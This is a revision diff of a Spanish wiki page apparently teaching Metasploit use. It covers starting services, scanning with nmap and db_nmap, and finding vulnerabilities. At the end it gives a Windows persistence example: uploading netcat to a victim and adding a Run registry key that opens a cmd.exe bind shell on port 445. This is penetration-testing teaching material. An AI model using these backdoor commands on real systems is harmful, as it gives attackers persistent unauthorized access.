meta data de esta página
  •  

Diferencias

Muestra las diferencias entre dos versiones de la página.

Enlace a la vista de comparación

Ambos lados, revisión anteriorRevisión previa
Próxima revisión
Revisión previa
aplicaciones:metasploit [2019/03/15 10:09] lcaplicaciones:metasploit [2023/01/18 14:10] (actual) – editor externo 127.0.0.1
Línea 4: Línea 4:
  
 Una vez instalado,  o si hemos usando una distribución de seguridad como Kali Linux, lo primero que tenemos que hacer es arrancar los servicios necesarios para el correcto funcionamiento del Metasploit Framework.  Una vez instalado,  o si hemos usando una distribución de seguridad como Kali Linux, lo primero que tenemos que hacer es arrancar los servicios necesarios para el correcto funcionamiento del Metasploit Framework. 
 +
 +<note>Si queremos utilizar el entorno gráfico de Metasploit, debemos ejecutar Armitage </note>
  
 En especial debemos arrancar las bases de de datos (msdb y postgresql) En especial debemos arrancar las bases de de datos (msdb y postgresql)
Línea 47: Línea 49:
  
 ===== Recopilar información ===== ===== Recopilar información =====
-Metasploit tiene varios escaneres integrados, podemos ver los que tiene integrados ejecutando  <sxh>seach portscan</sxh> +Metasploit tiene varios escaneres integrados, podemos ver los que tiene integrados ejecutando  
- +<sxh>seach portscan</sxh> 
-Por ejemplo podemos usar nmap para escanear un equipo <sxh>nmap -ss -Pn xxx.xxx.xxx.xxx</sxh> +Por ejemplo podemos usar nmap para escanear un equipo  
 +<sxh>nmap -ss -Pn xxx.xxx.xxx.xxx</sxh> 
  
-también podemos usar **db_nmap en especial si queremos manipular los resultados que nos muestre el nmap. <sxh>db_nmap -sS -Pn xxx.xxx.xxx.xxx</sxh> +también podemos usar **db_nmap** en especial si queremos manipular los resultados que nos muestre el nmap.  
 +<sxh>db_nmap -sS -Pn xxx.xxx.xxx.xxx</sxh> 
  
 === Buscar máquinas vulnerables === === Buscar máquinas vulnerables ===
 Podemos usar metasploit para hacer un escaneo de máquinas vulnerables . Para ello ponemos la opción **--script vuln**  a nuestro db_nmap Podemos usar metasploit para hacer un escaneo de máquinas vulnerables . Para ello ponemos la opción **--script vuln**  a nuestro db_nmap
-<sxh>db_nmap -sS -Pn --script vuln xxx.xxx.xxx.xxx>/sxh>+<sxh>db_nmap -sS -Pn --script vuln xxx.xxx.xxx.xxx</sxh>
  
 También podemos hacer uso de otros escaner específicos, con el comando use y el escaner a utilizar También podemos hacer uso de otros escaner específicos, con el comando use y el escaner a utilizar
Línea 70: Línea 74:
  
 Un ejemplo para mantener el control en una máquina windows sería: Un ejemplo para mantener el control en una máquina windows sería:
-  - a la máquina víctima le subimos una copia del netcat +  - a la máquina víctima le subimos una copia del netcat <sxh>upload nc.exe c:\windows\system32</sxh>
-<sxh>upload nc.exe c:\windows\system32</sxh>+
   - le creamos una clave en el registro para que arranque netcat automáticamente  <sxh>reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -Ldp445 -e cmd.exe</sxh>   - le creamos una clave en el registro para que arranque netcat automáticamente  <sxh>reg setval -k HKLM\\software\\microsoft\\windows\currentversion\\run -v nc -d 'c:\windows\system32\nc.exe -Ldp445 -e cmd.exe</sxh>